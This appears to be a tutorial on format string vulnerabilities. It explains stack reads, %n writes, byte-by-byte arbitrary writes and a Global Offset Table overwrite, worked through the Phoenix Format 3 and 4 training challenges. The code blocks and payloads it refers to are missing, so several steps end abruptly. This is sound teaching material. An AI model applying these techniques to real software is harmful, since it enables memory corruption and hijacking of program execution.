Format String Exploits
Theory
Format string vulnerabilities happen when user input goes here:
And not here:
Reading from the stack
You can specify more format strings than there are parameters to the printf, thereby reading more from the stack than what is expected:
Accessing the n-th element
An attacker can even directly access the n-th argument on the stack by using a special case format specifier:
Note: this is not always enabled, and does not always work! In that case, you can still just specify enough %x’s to get to where you want.
Reading arbitrary data
When %s is used as the format specifier, the function will treat the data on the stack as an address to go fetch a string from. This means that the attacker can potentially make %s read from any address, even if the data is not located on the stack.
For example, the above will cause printf() to print the string located at address 0xdeadbeef.
Writing to an address
%n will cause the number of characters written so far to be stored into the corresponding function argument. For example, the following code will store the integer 5 into the variable num_char:
With dummy output characters and width-controlling format specifiers, the attacker can now write arbitrary integers to the location pointed to by the function argument.
For example, %10d will pad the value to 10 characters.
And by using length modifiers, attackers are able to control the amount of data written with fine-grain control.
Btw, if you just want to crash the application, then this should create a segmentation fault:
Writing arbitrary values to arbitrary addresses
If you want to write a 32 bit integer to an address, then the maximum amount of padding you will need is 2,147,483,647. That’s too much, so you should instead write 1 or 2 bytes at a time. The below Phoenix Format 3 example will write 1 bytes at a time, but keep in mind that writing 2 bytes at a time with width-controlling format specifiers is safer, since your writes won’t overflow into unintended addresses.
We can just start writing from the least significant byte (byte with the lowest address, aka byte at the end of a string, due to little endianness) and then just keep overwriting the higher bytes. One byte at a time.
Phoenix Format 3 exploitation
Note 1: We will be overwriting values past the changeme variable. Hope it doesn't break anything.
Note 2: You can put the address before the %p's. It will make the payload significantly shorter.
I made a script for getting the correct output.
Exploit with:
Phoenix Format 3 explanation
The goal of this challenge is to write the value 0x64457845 to the address 0x08049844.
The first things in the payload are the 4 addresses we want to write to (1 address for each byte), separated by some padding.
Then, enough format strings are added to get to the start of the payload on the stack. In this case, 11 %p’s are needed. So we first write 10 %p’s and then %219p. The %219p is necessary because it adds enough padding that the number of characters written so far is 0x45. 0x45 is the last byte of the value 0x64457845, which we needed to write.
Then, since the next value on the stack is the correct address, and we have the correct amount of written characters, we can add a %n to write 0x45 to 0x08049844. It might also write some stuff to 0x08049845, depending on the number of characters written so far, but we will overwrite it later anyways, so it doesn’t really matter.
Then, we will write %49p to write enough characters that the amount of written characters ends with 0x78, and write that value to the next address using %n. The next address was written to be 0x08049845, 1 byte higher than previously.
Then, %203p will overflow the last byte of the amount of written characters back to 0x45. We write it using %n.
And after repeating the step again to write the last byte to the last address, we will have written the desired value to the desired address!
We have also written 3 bytes to the 3 bytes next to the address, but hopefully that won’t break anything.
Arbitrary code execution
It should be possible to use the format string exploit to overwrite the saved function return address just like we did in the stack smashing section.
However, instead, we will be overwriting the Global Offset Table to gain code execution. This is based on Phoenix format 4.
Analysing the GOT flow
The program looks something like this:
Looking at it in radare, this is what the call to the exit function looks like:
If we step into that call, the execution goes to this line:
Which will jump to the address specified at the address reloc.exit_228
And indeed, stepping once further, we end up at the address 0xf7f7f543.
So if we could change the value at the address 0x080497e4 to some other address (in the phoenix challenge, to 0x08048503) , then the execution flow will jump to that other address.
Solution
Changing the code from “writing arbitrary values to arbitrary addresses” slightly, I arrived at the following solution:
Exploit with:
Last updated